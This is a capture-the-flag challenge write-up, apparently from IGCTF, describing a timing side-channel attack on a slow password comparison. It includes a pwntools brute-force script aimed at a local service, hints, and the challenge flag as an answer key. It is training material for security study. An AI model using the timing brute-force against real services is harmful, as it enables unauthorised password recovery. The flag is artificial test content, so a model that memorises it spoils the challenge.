54 lines
1.4 KiB
Markdown
54 lines
1.4 KiB
Markdown
|
## Difficulty
|
||
|
|
85/100
|
||
|
|
tbh wss is
|
||
|
|
100/100 beter, ma ik wil het da nie geven cuz ik wil nie degene zijn
|
||
|
|
da zegt MIJN CHALLENGE IS DE MOEILIJKSTE dus ja we zullen zien na testing
|
||
|
|
|
||
|
|
|
||
|
|
## Category
|
||
|
|
Misc
|
||
|
|
|
||
|
|
## How To Solve
|
||
|
|
This is a timing comparison attack challenge. The password is compared
|
||
|
|
really slowly and by timing the duration of the answer, you can smart
|
||
|
|
bruteforce the password.
|
||
|
|
|
||
|
|
The duration of the comparison of one character is 0.1. This can be
|
||
|
|
timed by sending the alphabet letter by letter to the server and
|
||
|
|
timing the responses. The letter "s" would take longer to send back
|
||
|
|
because it is the first letter of the password.
|
||
|
|
|
||
|
|
Here is a solution script:
|
||
|
|
|
||
|
|
```py3
|
||
|
|
from pwn import *
|
||
|
|
|
||
|
|
def find(password, prevtime):
|
||
|
|
for c in string.ascii_lowercase:
|
||
|
|
new_pass = password + c
|
||
|
|
print(new_pass)
|
||
|
|
|
||
|
|
conn = remote("localhost", 3002)
|
||
|
|
conn.recv()
|
||
|
|
t = time.time()
|
||
|
|
|
||
|
|
conn.send((new_pass + "\n").encode())
|
||
|
|
ans = conn.recvline(timeout=prevtime + 1)
|
||
|
|
endtime = time.time() - t
|
||
|
|
print(endtime)
|
||
|
|
if endtime - prevtime > 0.08:
|
||
|
|
conn.close()
|
||
|
|
find(new_pass, endtime)
|
||
|
|
break
|
||
|
|
|
||
|
|
conn.close()
|
||
|
|
|
||
|
|
find("", 0)
|
||
|
|
```
|
||
|
|
|
||
|
|
## Hints
|
||
|
|
- I hope you payed attention to the course automata and computability!
|
||
|
|
- It might be useful information that my friend is German.
|
||
|
|
|
||
|
|
## Flag
|
||
|
|
IGCTF{THANKYOUALANTURINGITCOULDNOTHAVEBEENEASY}
|